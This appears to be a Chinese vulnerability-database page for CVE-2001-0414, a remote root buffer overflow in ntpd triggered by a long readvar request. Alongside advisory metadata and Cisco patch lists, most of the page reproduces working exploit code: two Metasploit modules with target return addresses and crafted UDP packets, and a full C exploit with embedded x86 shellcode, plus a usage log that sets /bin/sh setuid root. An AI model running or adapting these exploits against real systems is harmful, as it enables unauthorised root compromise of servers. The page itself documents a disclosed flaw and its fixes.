CVE-2001-0414
CVSS10.0
发布时间 :2001-06-18 00:00:00
修订时间 :2016-10-17 22:11:05
NMCOEPS    

[原文]Buffer overflow in ntpd ntp daemon 4.0.99k and earlier (aka xntpd and xntp3) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long readvar argument.


[CNNVD]Ntpd远程缓冲区溢出漏洞(CNNVD-200106-110)

        
        多种Unix/Linux操作系统和Cisco路由器的网络时间协议守护进程(NTPD)容易遭受远程缓冲区溢出攻击。
        由于NTP基于无状态的UDP协议,于是可以伪造各种恶意的请求报文,引发远程缓冲区溢出。绝大多数情况下,NTPD是以root身份启动的,所以远程缓冲区溢出后将直接获取root权限。
        尽管这次是常规缓冲区溢出,但为了有效利用它进行攻击还是相当困难的。目标缓冲区会因为某些原因被破坏,攻击完成时,shellcode真正可利用的缓冲区将小于70字节。下面的演示代码简单执行了/tmp/sh而已,完全可以构造一次完整的远程攻击。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:dave_mills:ntpd:4.0.99
cpe:/a:dave_mills:ntpd:4.0.99i
cpe:/a:dave_mills:ntpd:4.0.99h
cpe:/a:dave_mills:xntp3:5.93
cpe:/a:dave_mills:xntp3:5.93c
cpe:/a:dave_mills:xntp3:5.93e
cpe:/a:dave_mills:ntpd:4.0.99c
cpe:/a:dave_mills:ntpd:4.0.99b
cpe:/a:dave_mills:xntp3:5.93d
cpe:/a:dave_mills:ntpd:4.0.99g
cpe:/a:dave_mills:ntpd:4.0.99f
cpe:/a:dave_mills:ntpd:4.0.99a
cpe:/a:dave_mills:ntpd:4.0.99k
cpe:/a:dave_mills:ntpd:4.0.99j
cpe:/a:dave_mills:xntp3:5.93b
cpe:/a:dave_mills:ntpd:4.0.99e
cpe:/a:dave_mills:xntp3:5.93a
cpe:/a:dave_mills:ntpd:4.0.99d

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:5402Multiple Vendor NTP Buffer Overflow
oval:org.mitre.oval:def:3831Buffer Overflow in ntp Daemon via readvar
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0414
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0414
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-110
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:31.ntpd.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-01:31
ftp://ftp.netbsd.org/pub/NetBSD/misc/security/advisories/NetBSD-SA2001-004.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2001-004
ftp://ftp.sco.com/SSE/sse073.ltr
(UNKNOWN)  SCO  SSE073
ftp://ftp.sco.com/SSE/sse074.ltr
(UNKNOWN)  SCO  SSE074
http://archives.neohapsis.com/archives/bugtraq/2001-04/0127.html
(UNKNOWN)  BUGTRAQ  20010409 [ESA-20010409-01] xntp buffer overflow
http://archives.neohapsis.com/archives/bugtraq/2001-04/0225.html
(UNKNOWN)  BUGTRAQ  20010413 PROGENY-SA-2001-02A: [UPDATE] ntpd remote buffer overflow
http://archives.neohapsis.com/archives/bugtraq/2001-04/0314.html
(UNKNOWN)  BUGTRAQ  20010418 IBM MSS Outside Advisory Redistribution: IBM AIX: Buffer Overflow Vulnerability in (x)ntp
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000392
(UNKNOWN)  CONECTIVA  CLA-2001:392
http://lists.suse.com/archives/suse-security-announce/2001-Apr/0000.html
(UNKNOWN)  SUSE  SuSE-SA:2001:10
http://marc.info/?l=bugtraq&m=98642418618512&w=2
(UNKNOWN)  BUGTRAQ  20010404 ntpd =< 4.0.99k remote buffer overflow
http://marc.info/?l=bugtraq&m=98651866104663&w=2
(UNKNOWN)  DEBIAN  DSA-045
http://marc.info/?l=bugtraq&m=98654963328381&w=2
(UNKNOWN)  BUGTRAQ  20010405 Re: ntpd =< 4.0.99k remote buffer overflow]
http://marc.info/?l=bugtraq&m=98659782815613&w=2
(UNKNOWN)  BUGTRAQ  20010406 Immunix OS Security update for ntp and xntp3
http://marc.info/?l=bugtraq&m=98679815917014&w=2
(UNKNOWN)  BUGTRAQ  20010408 [slackware-security] buffer overflow fix for NTP
http://marc.info/?l=bugtraq&m=98683952401753&w=2
(UNKNOWN)  BUGTRAQ  20010409 ntp-4.99k23.tar.gz is available
http://marc.info/?l=bugtraq&m=98684202610470&w=2
(UNKNOWN)  BUGTRAQ  20010409 PROGENY-SA-2001-02: ntpd remote buffer overflow
http://marc.info/?l=bugtraq&m=98684532921941&w=2
(UNKNOWN)  BUGTRAQ  20010409 ntpd - new Debian 2.2 (potato) version is also vulnerable
http://www.calderasystems.com/support/security/advisories/CSSA-2001-013.0.txt
(UNKNOWN)  CALDERA  CSSA-2001-013
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-036.php3
(VENDOR_ADVISORY)  MANDRAKE  MDKSA-2001:036
http://www.redhat.com/support/errata/RHSA-2001-045.html
(UNKNOWN)  REDHAT  RHSA-2001:045
http://www.securityfocus.com/bid/2540
(VENDOR_ADVISORY)  BID  2540
http://xforce.iss.net/static/6321.php
(UNKNOWN)  XF  ntpd-remote-bo(6321)

- 漏洞信息

Ntpd远程缓冲区溢出漏洞
危急 边界条件错误
2001-06-18 00:00:00 2005-05-02 00:00:00
远程  
        
        多种Unix/Linux操作系统和Cisco路由器的网络时间协议守护进程(NTPD)容易遭受远程缓冲区溢出攻击。
        由于NTP基于无状态的UDP协议,于是可以伪造各种恶意的请求报文,引发远程缓冲区溢出。绝大多数情况下,NTPD是以root身份启动的,所以远程缓冲区溢出后将直接获取root权限。
        尽管这次是常规缓冲区溢出,但为了有效利用它进行攻击还是相当困难的。目标缓冲区会因为某些原因被破坏,攻击完成时,shellcode真正可利用的缓冲区将小于70字节。下面的演示代码简单执行了/tmp/sh而已,完全可以构造一次完整的远程攻击。
        

- 公告与补丁

        厂商补丁:
        Cisco
        -----
        Cisco已经为此发布了一个安全公告(Cisco-NTP)以及相应补丁:
        Cisco-NTP:Cisco Security Advisory: NTP Vulnerability
        链接:
        http://www.cisco.com/warp/public/707/NTP-pub.shtml

        补丁下载:
        Cisco IOS 10.3:
        Cisco IOS 11.0:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.1 IA:
         Cisco Upgrade IOS 12.2(3)
        Cisco IOS 11.1 CT:
         Cisco Upgrade IOS 12.0ST
        Cisco IOS 11.1 CC:
         Cisco Upgrade IOS 11.1(36)CC2
        Cisco IOS 11.1 CA:
        Cisco IOS 11.1 AA:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 11.1:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.2 XA:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.2 WA4:
         Cisco Upgrade IOS 12.0W
        Cisco IOS 11.2 SA:
         Cisco Upgrade IOS 12.0W
        Cisco IOS 11.2 P:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.2 GS:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.2 F:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.2 BC:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 11.2:
         Cisco Upgrade IOS 11.2(26a)
        Cisco IOS 11.3 XA:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.3 WA4:
         Cisco Upgrade IOS 12.0WA
        Cisco IOS 11.3 T:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.3 NA:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 11.3 MA:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 11.3 HA:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.3 DB:
         Cisco Upgrade IOS 12.1DB
        Cisco IOS 11.3 DA:
         Cisco Upgrade IOS 12.1DA
        Cisco IOS 11.3 AA:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 11.3:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 12.0 XV:
         Cisco Upgrade IOS 12.2(4)
        Cisco IOS 12.0 XU:
         Cisco Upgrade IOS 12.0WC
        Cisco IOS 12.0 XS:
         Cisco Upgrade IOS 12.1(8a)E
        Cisco IOS 12.0 XR:
         Cisco Upgrade IOS 12.2(3)
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.0 XQ:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XP:
         Cisco Upgrade IOS 12.0WC
        Cisco IOS 12.0 XN:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XM:
         Cisco Upgrade IOS 12.0(5)YB4
        Cisco IOS 12.0 XL:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XJ:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XI:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XH:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XG:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XF:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XE:
         Cisco Upgrade IOS 12.1(8a)E
        Cisco IOS 12.0 XD:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XC:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XB:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XA:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 WT:
        Cisco IOS 12.0 WC:
         Cisco Upgrade IOS 12.0(5)WC2
        Cisco IOS 12.0 T:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 ST:
         Cisco Upgrade IOS 12.0(17)ST1
        Cisco IOS 12.0 SL:
         Cisco Upgrade IOS 12.0(17)SL2
         Cisco Upgrade IOS 12.0ST
        Cisco IOS 12.0 SC:
         Cisco Upgrade IOS 12.0(16)SC
        Cisco IOS 12.0 S:
         Cisco Upgrade IOS 12.0(18)S
        Cisco IOS 12.0 DC:
         Cisco Upgrade IOS 12.1DC
        Cisco IOS 12.0 DB:
         Cisco Upgrade IOS 12.1(5)DB2
        Cisco IOS 12.0 DA:
         Cisco Upgrade IOS 12.1(7)DA2
        Cisco IOS 12.0 (7)XK:
        Cisco IOS 12.0 (5)XK:
        Cisco IOS 12.0 (14)W5(20):
         Cisco Upgrade IOS 12.0(18)W5(22)
        Cisco IOS 12.0 (13)W5(19c):
         Cisco Upgrade IOS 12.0(16)W5(21)
        Cisco IOS 12.0 (10)W5(18g):
         Cisco Upgrade IOS 12.0(18)W5(22a)
        Cisco IOS 12.0:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 12.1 YF:
         Cisco Upgrade IOS 12.1(5)YF2
        Cisco IOS 12.1 YD:
         Cisco Upgrade IOS 12.1(5)YD2
        Cisco IOS 12.1 YC:
         Cisco Upgrade IOS 12.1(5)YC1
        Cisco IOS 12.1 YB:
         Cisco Upgrade IOS 12.1(5)YB4
        Cisco IOS 12.1 YA:
        Cisco IOS 12.1 XZ:
        Cisco IOS 12.1 XY:
        Cisco IOS 12.1 XX:
        Cisco IOS 12.1 XW:
         Cisco Upgrade IOS 12.2DD
        Cisco IOS 12.1 XV:
         Cisco Upgrade IOS 12.1(5)XV3
        Cisco IOS 12.1 XU:
         Cisco Upgrade IOS 12.2(2)XA
        Cisco IOS 12.1 XT:
         Cisco Upgrade IOS 12.1(5)YB4
        Cisco IOS 12.1 XS:
         Cisco Upgrade IOS 12.1(5)XS2
        Cisco IOS 12.1 XR:
         Cisco Upgrade IOS 12.1(5)YD2
        Cisco IOS 12.1 XQ:
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.1 XP:
         Cisco Upgrade IOS 12.1(5)YB4
        Cisco IOS 12.1 XM:
         Cisco Upgrade IOS 12.1(5)XM4
        Cisco IOS 12.1 XL:
         Cisco Upgrade IOS 12.2(3)
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.1 XK:
        Cisco IOS 12.1 XJ:
         Cisco Upgrade IOS 12.1(5)YB4
        Cisco IOS 12.1 XI:
         Cisco Upgrade IOS 12.2(3)
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.1 XH:
         Cisco Upgrade IOS 12.2(3)
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.1 XG:
        Cisco IOS 12.1 XF:
         Cisco Upgrade IOS 12.1(2)XF4
        Cisco IOS 12.1 XE:
        Cisco IOS 12.1 XD:
         Cisco Upgrade IOS 12.2(3)
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.1 XC:
         Cisco Upgrade IOS 12.2(3)
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.1 XB:
        Cisco IOS 12.1 XA:
         Cisco Upgrade IOS 12.2(3)
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.1 T:
         Cisco Upgrade IOS 12.2(3)
         Cisco Upgrade IOS 12.1(5)T9
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.1 EZ:
         Cisco Upgrade IOS 12.1(6)EZ2
        Cisco IOS 12.1 EY:
         Cisco Upgrade IOS 12.1(6)EY
        Cisco IOS 12.1 EX:
         Cisco Upgrade IOS 12.1(8a)E
        Cisco IOS 12.1 EC:
         Cisco Upgrade IOS 12.1(7)EC
        Cisco IOS 12.1 E:
         Cisco Upgrade IOS 12.1(8a)E
        Cisco IOS 12.1 DC:
         Cisco Upgrade IOS 12.2(2)B
        Cisco IOS 12.1 DB:
         Cisco Upgrade IOS 12.2(2)B
        Cisco IOS 12.1 DA:
         Cisco Upgrade IOS 12.1(7)DA2
        Cisco IOS 12.1 CX:
         Cisco Upgrade IOS 12.1(7)CX
        Cisco IOS 12.1 AA:
         Cisco Upgrade IOS 12.1(9)AA
        Cisco IOS 12.1:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.2 XQ:
         Cisco Upgrade IOS 12.2(1)XQ
        Cisco IOS 12.2 XH:
         Cisco Upgrade IOS 12.2(1)XH
        Cisco IOS 12.2 XE:
         Cisco Upgrade IOS 12.2(1)XE
        Cisco IOS 12.2 XD:
         Cisco Upgrade IOS 12.2(1)XD1
        Cisco IOS 12.2 XA:
         Cisco Upgrade IOS 12.2(2)XA1
         Cisco Upgrade IOS 12.2(2)XA
        Cisco IOS 12.2 T:
         Cisco Upgrade IOS 12.2(4)T
        Cisco IOS 12.2 S:
         Cisco Upgrade IOS 12.2(1.4)S
        Cisco IOS 12.2 PI:
        

- 漏洞信息 (16285)

NTP daemon readvar Buffer Overflow (EDBID:16285)
linux remote
2010-08-25 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ntp_overflow.rb 10150 2010-08-25 20:55:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'NTP daemon readvar Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack based buffer overflow in the
				ntpd and xntpd service. By sending an overly long 'readvar'
				request it is possible to execute code remotely. As the stack
				is corrupted, this module uses the Egghunter technique.
			},
			'Author'         => 'patrick',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10150 $',
			'References'     =>
				[
						[ 'CVE', '2001-0414' ],
						[ 'OSVDB', '805' ],
						[ 'BID', '2540' ],
						[ 'US-CERT-VU', '970472' ],
				],
			'Payload'        =>
				{
					'Space'    => 220,
					'BadChars' => "\x00\x01\x02\x16,=",
					'StackAdjustment' => -3500,
					'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "xor eax,eax mov al,27 int 0x80").encode_string, # alarm(0)
					'Compat'   =>
					{
						'ConnectionType' => '-reverse',
					},
				},
			'Platform'       => [ 'linux' ],
			'Arch'		 => [ ARCH_X86 ],
			'Targets'        =>
				[
						[ 'RedHat Linux 7.0 ntpd 4.0.99j', 		{ 'Ret' => 0xbffffbb0 } ],
						[ 'RedHat Linux 7.0 ntpd 4.0.99j w/debug', 	{ 'Ret' => 0xbffff980 } ],
						[ 'RedHat Linux 7.0 ntpd 4.0.99k', 		{ 'Ret' => 0xbffffbb0 } ],
						#[ 'FreeBSD 4.2-STABLE', 			{ 'Ret' => 0xbfbff8bc } ],
						[ 'Debugging', 					{ 'Ret' => 0xdeadbeef } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Apr 04 2001',
			'DefaultTarget' => 0))

		register_options([Opt::RPORT(123)], self.class)
	end

	def exploit

		hunter  = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
		egg     = hunter[1]

		connect_udp

		pkt1 = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x016stratum="
		pkt2 = "\x16\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00"

		sploit =  pkt1 + make_nops(512 - pkt1.length)
		sploit[(220 + pkt1.length), 4] = [target['Ret']].pack('V')
		sploit[(224 + pkt1.length), hunter[0].length] = hunter[0]

		print_status("Trying target #{target.name}...")

		print_status("Sending hunter")
		udp_sock.put(sploit)
		select(nil,nil,nil,0.5)

		print_status("Sending payload")
		udp_sock.put(pkt1 + egg)
		select(nil,nil,nil,0.5)

		print_status("Calling overflow trigger")
		udp_sock.put(pkt2)
		select(nil,nil,nil,0.5)

		handler
		disconnect_udp

	end

end
		

- 漏洞信息 (20727)

Ntpd Remote Buffer Overflow Vulnerability (EDBID:20727)
linux remote
2001-04-04 Verified
0 babcia padlina ltd
N/A [点击下载]
source: http://www.securityfocus.com/bid/2540/info

NTP, the Network Time Protocol, is used to synchronize the time between a computer and another system or time reference. It uses UDP as a transport protocol. There are two protocol versions in use: NTP v3 and NTP v4. The 'ntpd' daemon implementing version 3 is called 'xntp3'; the version implementing version 4 is called 'ntp'.

On UNIX systems, the 'ntpd' daemon is available to regularly synchronize system time with internet time servers.

Many versions of 'ntpd' are prone to a remotely exploitable buffer-overflow issue. A remote attacker may be able to crash the daemon or execute arbitrary code on the host.

If successful, the attacker may gain root access on the victim host or may denial NTP service on the affected host. 

/* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */

/*
 * Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerable
 * to remote buffer overflow attack. It occurs when building response for
 * a query with large readvar argument. In almost all cases, ntpd is running
 * with superuser privileges, allowing to gain REMOTE ROOT ACCESS to timeserver.
 *
 * Althought it's a normal buffer overflow, exploiting it is much harder.
 * Destination buffer is accidentally damaged, when attack is performed, so
 * shellcode can't be larger than approx. 70 bytes. This proof of concept code
 * uses small execve() shellcode to run /tmp/sh binary. Full remote attack
 * is possible.
 *
 * NTP is stateless UDP based protocol, so all malicious queries can be
 * spoofed.
 *
 * Example of use on generic RedHat 7.0 box:
 *
 * [venglin@cipsko venglin]$ cat dupa.c
 * main() { setreuid(0,0); system("chmod 4755 /bin/sh");  }
 * [venglin@cipsko venglin]$ cc -o /tmp/sh dupa.c
 * [venglin@cipsko venglin]$ cc -o ntpdx ntpdx.c
 * [venglin@cipsko venglin]$ ./ntpdx -t2 localhost
 * ntpdx v1.0 by venglin@freebsd.lublin.pl
 * 
 * Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh)
 *
 * RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
 * [1] <- evil query (pkt = 512 | shell = 45)
 * [2] <- null query (pkt = 12)
 * Done.
 * /tmp/sh was spawned.
 * [venglin@cipsko venglin]$ ls -al /bin/bash
 * -rwsr-xr-x    1 root     root       512540 Aug 22  2000 /bin/bash
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>

#define NOP	0x90
#define ADDRS	8
#define PKTSIZ	512

static char usage[] = "usage: ntpdx [-o offset] <-t type> <hostname>";

/* generic execve() shellcodes */

char lin_execve[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/sh";

char bsd_execve[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

struct platforms
{
	char *os;
	char *version;
	char *code;
	long ret;
	int align;
	int shalign;
	int port;
};

/* Platforms. Notice, that on FreeBSD shellcode must be placed in packet 
 * *after* RET address. This values will vary from platform to platform.
 */

struct platforms targ[] =
{
	{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
		0xbfbff8bc, 200, 220, 0 },

	{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
		0xbfbff540, 200, 220, 0 },

	{ "RedHat Linux 7.0", "4.0.99k-RPM (/tmp/sh)", lin_execve,
		0xbffff777, 240, 160, 0 },

	{ NULL, NULL, NULL, 0x0, 0, 0, 0 }
};

long getip(name)
char *name;
{
	struct hostent *hp;
	long ip;
	extern int h_errno;

	if ((ip = inet_addr(name)) < 0)
	{
		if (!(hp = gethostbyname(name)))
		{
			fprintf(stderr, "gethostbyname(): %s\n",
				strerror(h_errno));
			exit(1);
		}
		memcpy(&ip, (hp->h_addr), 4);
	}

	return ip;
}

int doquery(host, ret, shellcode, align, shalign)
char *host, *shellcode;
long ret;
int align, shalign;
{
	/* tcpdump-based reverse engineering :)) */

	char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
		      0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61,
		      0x74, 0x75, 0x6d, 0x3d };

	char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
		      0x00, 0x00, 0x00, 0x00 };

	char buf[PKTSIZ], *p;
	long *ap;
	int i;

	int sockfd;
	struct sockaddr_in sa;

	bzero(&sa, sizeof(sa));

	sa.sin_family = AF_INET;
	sa.sin_port = htons(123);
	sa.sin_addr.s_addr = getip(host);

	if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
	{
		perror("socket");
		return -1;
	}

	if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0)
	{
		perror("connect");
		close(sockfd);
		return -1;
	}

	memset(buf, NOP, PKTSIZ);
	memcpy(buf, q2, sizeof(q2));

	p = buf + align;
	ap = (unsigned long *)p;
                
	for(i=0;i<ADDRS/4;i++)
		*ap++ = ret;

	p = (char *)ap;

	memcpy(buf+shalign, shellcode, strlen(shellcode));

	if((write(sockfd, buf, PKTSIZ)) < 0)
	{
		perror("write");
		close(sockfd);
		return -1;
	}

	fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ,
		strlen(shellcode));
	fflush(stderr);

        if ((write(sockfd, q3, sizeof(q3))) < 0)
        {
                perror("write");
                close(sockfd);
                return -1;
        }

	fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3));
	fflush(stderr);

	close(sockfd);

	return 0;
}

int main(argc, argv)
int argc;
char **argv;
{
	extern int optind, opterr;
	extern char *optarg;
	int ch, type, ofs, i;
	long ret;

	opterr = ofs = 0;
	type = -1;

	while ((ch = getopt(argc, argv, "t:o:")) != -1)
		switch((char)ch)
		{
			case 't':
				type = atoi(optarg);
				break;

			case 'o':
				ofs = atoi(optarg);
				break;

			case '?':
			default:
				puts(usage);
				exit(0);

		}

	argc -= optind;
	argv += optind;

	fprintf(stderr, "ntpdx v1.0 by venglin@freebsd.lublin.pl\n\n");

	if (type < 0)
	{
		fprintf(stderr, "Please select platform:\n");
		for (i=0;targ[i].os;i++)
		{
			fprintf(stderr, "\t-t %d : %s %s (%p)\n", i,
			targ[i].os, targ[i].version, (void *)targ[i].ret);
		}

		exit(0);
	}

	fprintf(stderr, "Selected platform: %s with ntpd %s\n\n",
			targ[type].os, targ[type].version);

	ret = targ[type].ret;
	ret += ofs;

	if (argc != 1)
	{
		puts(usage);
		exit(0);
	}

	fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending query\n",
		(void *)ret, targ[type].align, targ[type].shalign);

	if (doquery(*argv, ret, targ[type].code, targ[type].align,
		targ[type].shalign) < 0)
	{
		fprintf(stderr, "Failed.\n");
		exit(1);
	}

	fprintf(stderr, "Done.\n");

	if (!targ[type].port)
	{
		fprintf(stderr, "/tmp/sh was spawned.\n");
		exit(0);
	}

	exit(0);
}
		

- 漏洞信息 (F82268)

NTPd Buffer Overflow (PacketStormID:F82268)
2009-10-27 00:00:00
patrick  metasploit.com
exploit,overflow
CVE-2001-0414
[点击下载]

This Metasploit module exploits a stack based buffer overflow in the ntpd and xntpd service. By sending an overly long 'readvar' request it is possible to execute code remotely. As the stack is corrupted, this module uses the Egghunter technique.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'NTP daemon readvar Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack based buffer overflow in the
				ntpd and xntpd service. By sending an overly long 'readvar'
				request it is possible to execute code remotely. As the stack
				is corrupted, this module uses the Egghunter technique.
			},
			'Author'         => 'patrick',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
						[ 'CVE', '2001-0414' ],
						[ 'OSVDB', '805' ],
						[ 'BID', '2540' ],
						[ 'URL', 'http://www.kb.cert.org/vuls/id/970472' ],
				],
			'Payload'        =>
				{
					'Space'    => 220,
					'BadChars' => "\x00\x01\x02\x16,=",
					'StackAdjustment' => -3500,
					'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "xor eax,eax mov al,27 int 0x80").encode_string, # alarm(0)
					'Compat'   => 
					{
						'ConnectionType' => '-reverse',
					},
				},
			'Platform'       => [ 'linux' ],
			'Arch'		 => [ ARCH_X86 ],
			'Targets'        =>
				[
						[ 'RedHat Linux 7.0 ntpd 4.0.99j', 		{ 'Ret' => 0xbffffbb0 } ],
						[ 'RedHat Linux 7.0 ntpd 4.0.99j w/debug', 	{ 'Ret' => 0xbffff980 } ],
						[ 'RedHat Linux 7.0 ntpd 4.0.99k', 		{ 'Ret' => 0xbffffbb0 } ],
						#[ 'FreeBSD 4.2-STABLE', 			{ 'Ret' => 0xbfbff8bc } ],
						[ 'Debugging', 					{ 'Ret' => 0xdeadbeef } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Apr 04 2001',
			'DefaultTarget' => 0))

			register_options([Opt::RPORT(123)], self.class)
	end

	def exploit

		hunter  = generate_egghunter
		egg     = hunter[1]

		connect_udp

		pkt1 = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x016stratum="
		pkt2 = "\x16\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00"

		sploit =  pkt1 + make_nops(512 - pkt1.length)
		sploit[(220 + pkt1.length), 4] = [target['Ret']].pack('V')
		sploit[(224 + pkt1.length), hunter[0].length] = hunter[0]

		print_status("Trying target #{target.name}...")

		print_status("Sending hunter")
		udp_sock.put(sploit)
		sleep(0.5)

		print_status("Sending payload")
		udp_sock.put(pkt1 + egg + egg + payload.encoded)
		sleep(0.5)

		print_status("Calling overflow trigger")
		udp_sock.put(pkt2)
		sleep(0.5)

		handler
		disconnect_udp

	end

end

    

- 漏洞信息

805
NTP ntpd readvar Variable Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in the Network Time Protocol Daemon (ntpd). The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request, containing an overly long 'readvar' argument a remote attacker can gain access to root privileges resulting in a loss of integrity.

- 时间线

2001-04-04 Unknow
2001-04-04 Unknow

- 解决方案

Contact your vendor for an appropriate upgrade. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Ntpd Remote Buffer Overflow Vulnerability
Boundary Condition Error 2540
Yes No
2001-04-04 12:00:00 2007-11-05 05:05:00
This vulnerability was published in an exploit written by Przemyslaw Frasunek <venglin@freebsd.lublin.pl> and posted to Bugtraq on April 4, 2001.

- 受影响的程序版本

Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
